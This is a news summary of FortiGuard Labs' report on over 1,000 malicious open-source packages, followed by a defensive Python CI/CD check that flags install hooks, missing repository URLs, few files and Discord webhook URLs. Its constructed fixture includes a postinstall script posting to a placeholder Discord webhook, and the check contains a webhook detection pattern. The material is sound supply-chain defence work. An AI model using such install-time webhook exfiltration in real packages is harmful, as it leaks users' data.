Over 1000 Malicious Packages Found Exploiting Open-Source Platforms

Fortinet’s FortiGuard Labs has identified over 1,000 malicious software packages targeting open-source platforms since November 2024. Its analysis reveals sophisticated evasion tactics: minimal code spread across very few files, suspicious installation scripts, missing repository URLs, and hidden command-and-control communications. The research uncovered malicious Python packages that collect system information, Node.js scripts that harvest sensitive data via Discord webhooks, and obfuscated JavaScript that installs backdoors. Security experts recommend that organizations implement proactive defence measures, including automated validation of library attributes in CI/CD pipelines, to detect these increasingly sophisticated threats before they reach production environments.
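As an added illustration (not FortiGuard's tooling or rules), the following Python check turns the red flags listed above into a CI/CD gate for an npm package: a very low file count, install-time lifecycle scripts, a missing repository URL, and a Discord webhook URL in the shipped source. The sample manifests and file contents are constructed, and the threshold and regex are this example's own assumptions.

```python
import re
from typing import Any

# Red flags named in the FortiGuard summary; the threshold and pattern below
# are assumptions made for this example, not published detection rules.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")  # npm hooks that run code at install
LOW_FILE_COUNT = 3
WEBHOOK_RE = re.compile(r"https://discord(?:app)?\.com/api/webhooks/\S+")


def check_package(manifest: dict[str, Any], files: dict[str, str]) -> list[str]:
    """Return the red flags found for one package.

    manifest: parsed package.json; files: path -> source text of the tarball contents.
    """
    findings: list[str] = []
    if len(files) <= LOW_FILE_COUNT:
        findings.append(f"low file count ({len(files)})")
    scripts = manifest.get("scripts") or {}
    for hook in INSTALL_HOOKS:
        if hook in scripts:
            findings.append(f"install-time script '{hook}': {scripts[hook]}")
    repo = manifest.get("repository")
    url = repo.get("url") if isinstance(repo, dict) else repo
    if not url:
        findings.append("missing repository URL")
    for path, text in files.items():
        if WEBHOOK_RE.search(text):
            findings.append(f"Discord webhook URL in {path}")
    return findings


def gate(manifest: dict[str, Any], files: dict[str, str], max_findings: int = 0) -> bool:
    """CI/CD gate: True when the package has no more than max_findings red flags."""
    return len(check_package(manifest, files)) <= max_findings


# Constructed sample packages (placeholders, not real packages).
BENIGN_MANIFEST = {"name": "sample-benign", "version": "1.0.0",
                   "repository": {"type": "git", "url": "https://github.com/example/sample-benign"}}
BENIGN_FILES = {f"lib/mod{i}.js": "module.exports = {};" for i in range(12)}

SUSPICIOUS_MANIFEST = {"name": "sample-suspicious", "version": "1.0.0",
                       "scripts": {"postinstall": "node setup.js"}}
SUSPICIOUS_FILES = {
    "package.json": "{}",
    "setup.js": "fetch('https://discord.com/api/webhooks/0000/PLACEHOLDER', {method: 'POST'});",
}

if __name__ == "__main__":
    for label, m, f in (("benign", BENIGN_MANIFEST, BENIGN_FILES),
                        ("suspicious", SUSPICIOUS_MANIFEST, SUSPICIOUS_FILES)):
        print(label, "passes" if gate(m, f) else "blocked", check_package(m, f))
```

In a real pipeline the manifest and file map would come from the downloaded tarball before it is installed, and the gate would fail the build rather than print.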
